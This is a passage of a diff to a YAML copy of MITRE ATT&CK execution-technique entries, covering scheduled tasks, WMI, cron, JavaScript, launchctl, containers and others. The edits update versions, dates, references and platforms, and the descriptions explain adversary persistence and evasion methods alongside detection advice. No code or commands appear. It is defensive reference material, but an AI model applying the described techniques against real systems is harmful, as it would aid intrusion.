-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24897,7 +25214,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24929,8 +25246,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24944,6 +25261,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24956,16 +25277,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -25031,7 +25355,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -25108,66 +25431,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -25180,31 +25448,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -25262,9 +25582,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -25356,20 +25675,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -25397,7 +25715,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25417,33 +25735,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25460,6 +25758,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -25470,9 +25769,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -25480,8 +25783,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -25521,7 +25840,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25546,12 +25865,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25631,11 +25948,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25695,12 +26011,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25798,9 +26113,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25817,19 +26132,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25838,7 +26152,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25875,11 +26189,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25916,11 +26229,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25939,13 +26251,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -26024,12 +26335,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -26040,6 +26350,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -26050,16 +26361,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -26090,14 +26401,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -26163,39 +26471,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
